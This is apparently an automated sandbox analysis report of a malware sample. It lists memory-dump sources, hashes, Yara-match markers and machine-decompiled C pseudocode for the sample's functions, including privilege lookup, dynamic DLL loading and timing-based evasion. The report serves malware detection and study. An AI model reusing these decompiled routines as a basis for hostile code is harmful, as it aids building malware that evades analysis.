                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0085FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00408E70 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 66%
                                                        			E00408E70(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E004071C0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004073D0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BEF0( &_v284, 0x104);
						E0041C560( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E004159E0(E00415980(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x18; // 0x5e14c483
						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407400( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_push( &_v24);
					_push(_t52); // executed
					_t34 = E00407480(_t39); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
					_t20 = _t52 + 0x35; // 0xffff43e8
					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}




















                                                        0x00408e7b
                                                        0x00408e83
                                                        0x00408e85
                                                        0x00408e8a
                                                        0x00408e8f
                                                        0x00408ea2
                                                        0x00408ea7
                                                        0x00408eb0
                                                        0x00408ebc
                                                        0x00408ecf
                                                        0x00408ed4
                                                        0x00408ed7
                                                        0x00408ee0
                                                        0x00408ef2
                                                        0x00408ef7
                                                        0x00408efc
                                                        0x00000000
                                                        0x00000000
                                                        0x00408efe
                                                        0x00408f02
                                                        0x00000000
                                                        0x00000000
                                                        0x00408f04
                                                        0x00000000
                                                        0x00408f02
                                                        0x00408f06
                                                        0x00408f09
                                                        0x00408f0f
                                                        0x00408f11
                                                        0x00408f1c
                                                        0x00408f21
                                                        0x00408f24
                                                        0x00408f2f
                                                        0x00408f30
                                                        0x00408f31
                                                        0x00408f3c
                                                        0x00408f3e
                                                        0x00408f44
                                                        0x00408f48
                                                        0x00408f4b
                                                        0x00408f4b
                                                        0x00408f52
                                                        0x00408f55
                                                        0x00408f5a
                                                        0x00408f67
                                                        0x00408e96
                                                        0x00408e96
                                                        0x00408e96

                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 27ca8296a09ebefc98364ae91601f06ffc84b21d7e82a9254a1edf0fb0f1f047
                                                        • Instruction ID: f6d2a4ae43c0e80154541ee1f12fa55f7c3f5c6d6a8e09a367c06d0bec02e1f3
                                                        • Opcode Fuzzy Hash: 27ca8296a09ebefc98364ae91601f06ffc84b21d7e82a9254a1edf0fb0f1f047
                                                        • Instruction Fuzzy Hash: 00210CB2D4020957CB14D670DD42AEB73AC9B54308F44057FF989E3181FA387B4987A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A612 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(&QA,?,0041589F,0041589F,?,00415126,?,?,?,?,?,00000000,004090B3,?), ref: 0041A5CD
                                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A648
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateExitHeapProcess
                                                        • String ID: &QA
                                                        • API String ID: 1054155344-1643839059
                                                        • Opcode ID: 2b102533b8bf055206c34439dc54e66d7fe00a8a369fe2c5bf1f6105ee19a667
                                                        • Instruction ID: 99c6ee4e176d8df1f414021d3a2491ffb5ef093e05c339f36cc8711dbe6d7b5a
                                                        • Opcode Fuzzy Hash: 2b102533b8bf055206c34439dc54e66d7fe00a8a369fe2c5bf1f6105ee19a667
                                                        • Instruction Fuzzy Hash: A8F0C2B52053447BCB20EF65CC81ED77799AF45768F04844AF84C5B242C634E956CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A5A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 10 41a5a0-41a5d1 call 41af20 RtlAllocateHeap
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(&QA,?,0041589F,0041589F,?,00415126,?,?,?,?,?,00000000,004090B3,?), ref: 0041A5CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: &QA
                                                        • API String ID: 1279760036-1643839059
                                                        • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                                        • Instruction ID: 2a730f70d87c6ab8d876abe578f12bb998df62c6dc8c1e23a4715ed9ac41e0db
                                                        • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                                        • Instruction Fuzzy Hash: EBE01AB12002046BDB14DF49DC45E9737ADAF88654F018155BA085B241C530F9108AB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004075F3 Relevance: 1.6, APIs: 1, Instructions: 66threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 208 4075f3-4075f4 209 407634-40766c call 41bf40 call 41cb20 call 40a0e0 208->209 210 4075f6 208->210 212 40766d-40767a call 415a40 209->212 211 4075f8-407603 210->211 210->212 211->209 218 40767c-40768e PostThreadMessageW 212->218 219 4076ae-4076b2 212->219 221 407690-4076aa call 409840 218->221 222 4076ad 218->222 221->222 222->219
                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040768A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 1ea0d3d9e0e4f3eb70fb3fe8c9b1ffba7b81a8bc8763de7ddbbd544b7c0a892b
                                                        • Instruction ID: f026a35aca63d969c2ce534e3b16ec01f7963c66b54c96cc342e9683c5c98b31
                                                        • Opcode Fuzzy Hash: 1ea0d3d9e0e4f3eb70fb3fe8c9b1ffba7b81a8bc8763de7ddbbd544b7c0a892b
                                                        • Instruction Fuzzy Hash: 7C010831F801287AE720A695DC43FFE77189B44B65F04453AFA00FA2C1E6A97D0647E9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00407629 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 235 407629-40763f 236 407648-40767a call 41cb20 call 40a0e0 call 415a40 235->236 237 407643 call 41bf40 235->237 245 40767c-40768e PostThreadMessageW 236->245 246 4076ae-4076b2 236->246 237->236 247 407690-4076aa call 409840 245->247 248 4076ad 245->248 247->248 248->246
                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040768A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: e5ddc434e8da6e234e1fd4322a2e39aa8af1017baf877f63009cd6e35768131a
                                                        • Instruction ID: a598b0dbbc9134c15099927b5cd9f51b64e91dad818f80e404e1b3cc3e721165
                                                        • Opcode Fuzzy Hash: e5ddc434e8da6e234e1fd4322a2e39aa8af1017baf877f63009cd6e35768131a
                                                        • Instruction Fuzzy Hash: 7501D831A802187AE730A6959C43FFE772C9F40B54F04412DFB04BA1C1D7A9790647E9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00407630 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 251 407630-40763f 252 407648-40767a call 41cb20 call 40a0e0 call 415a40 251->252 253 407643 call 41bf40 251->253 261 40767c-40768e PostThreadMessageW 252->261 262 4076ae-4076b2 252->262 253->252 263 407690-4076aa call 409840 261->263 264 4076ad 261->264 263->264 264->262
                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040768A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: e227a9f55e9655ffb82b1c4267eddf86497179bf27cde26b4fa5978877c83a4f
                                                        • Instruction ID: fa4d66a970e316ab97ee316df40dc40f2c28fb8d869ffdedeab5936c75815792
                                                        • Opcode Fuzzy Hash: e227a9f55e9655ffb82b1c4267eddf86497179bf27cde26b4fa5978877c83a4f
                                                        • Instruction Fuzzy Hash: 1F01A731A802287BE720A6959C43FFF776C9F44B54F04412AFF04BA1C1E6A9790647EA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A5E0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 297 41a5e0-41a611 call 41af20 RtlFreeHeap
                                                        C-Code - Quality: 100%
                                                        			E0041A5E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc90; // 0xc90
				E0041AF20( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                        0x0041a5ef
                                                        0x0041a5f7
                                                        0x0041a60d
                                                        0x0041a611

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,004090B3,?,?,004090B3,00000060,00000000,00000000,?,?,004090B3,?,00000000), ref: 0041A60D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                                        • Instruction ID: 464c70d3af3814a69a75cf698def59deb339e514249c01d2b25926d4b45fecd6
                                                        • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                                        • Instruction Fuzzy Hash: 12E01AB12002046BD714DF49DC49EA737ADAF88754F114159B90857241C530E9108AB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A740 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0041A740(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041AF20( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                        0x0041a75a
                                                        0x0041a770
                                                        0x0041a774

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D562,0040D562,00000041,00000000,?,00409125), ref: 0041A770
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                                        • Instruction ID: e588b84fdf650a5406be97cb40cbe76c444197855ad9c0e49af8bf90355b8ea0
                                                        • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                                        • Instruction Fuzzy Hash: EDE01AB22002086BDB10DF49DC45EE737ADAF89664F018155BA0857241C530E8158AB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A620 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0041A620(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041AF20( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xc98,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                        0x0041a623
                                                        0x0041a63a
                                                        0x0041a648

                                                        APIs
                                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A648
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                                        • Instruction ID: 7f414ff012d9aae071d189fb1b515e73150d57ea7af78d7796793094b67a6b8c
                                                        • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                                        • Instruction Fuzzy Hash: 32D017726002187BD620EB99DC89FD777ACDF457A4F0180A6BA0C6B242C934FA5187E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040A0D3 Relevance: 1.5, APIs: 1, Instructions: 13libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E0040A0D3(signed int __eax, signed int __ebx, void* __ecx, void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v540;
				void* _t22;
				struct _OBJDIR_INFORMATION _t24;
				struct _OBJDIR_INFORMATION _t25;
				void* _t44;
				void* _t46;
				void* _t47;

				_push(es);
				asm("loopne 0x79");
				asm("out dx, eax");
				 *(__ecx + __ebx * 2 - 0x74) =  *(__ecx + __ebx * 2 - 0x74) & __eax;
				_v12 =  &_v540;
				_t22 = E0041CD70(__edi,  &_v16, 0x104, _a4);
				_t46 = _t44 - 0x214 + 0xc;
				if(_t22 != 0) {
					_t24 = E0041D190(__eflags, _v8);
					_t47 = _t46 + 4;
					__eflags = _t24;
					if(_t24 != 0) {
						E0041D410( &_v12, 0);
						_t47 = _t47 + 8;
					}
					_t25 = E0041B4C0(_v8);
					_v16 = _t25;
					__eflags = _t25;
					if(_t25 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						_t25 = _v16;
					}
					return _t25;
				} else {
					return _t22;
				}
			}













                                                        0x0040a0d3
                                                        0x0040a0d4
                                                        0x0040a0d6
                                                        0x0040a0dc
                                                        0x0040a0fc
                                                        0x0040a0ff
                                                        0x0040a104
                                                        0x0040a109
                                                        0x0040a113
                                                        0x0040a118
                                                        0x0040a11b
                                                        0x0040a11d
                                                        0x0040a125
                                                        0x0040a12a
                                                        0x0040a12a
                                                        0x0040a131
                                                        0x0040a139
                                                        0x0040a13c
                                                        0x0040a13e
                                                        0x0040a152
                                                        0x0040a154
                                                        0x0040a154
                                                        0x0040a15a
                                                        0x0040a10b
                                                        0x0040a10e
                                                        0x0040a10e

                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A152
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 0ba5eb0ca508fad6ddbea8a944ac1c6cea52edcdc7b16ad42aba06ba11698ec8
                                                        • Instruction ID: 9633dd9c7faedaec9e0e039afaa16631705d3f6b186ad1a438174faa9559c38c
                                                        • Opcode Fuzzy Hash: 0ba5eb0ca508fad6ddbea8a944ac1c6cea52edcdc7b16ad42aba06ba11698ec8
                                                        • Instruction Fuzzy Hash: 98C0C030E242049FEF10C9944C02FB833D0C3103B3F3001E76C0CDB381D4220C100290
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 008610D0 Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                        • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                        • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                        • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00860060 Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                        • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                        • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                        • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008601D4 Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                        • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                        • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                        • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0086010C Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                        • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                        • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                        • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00861148 Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
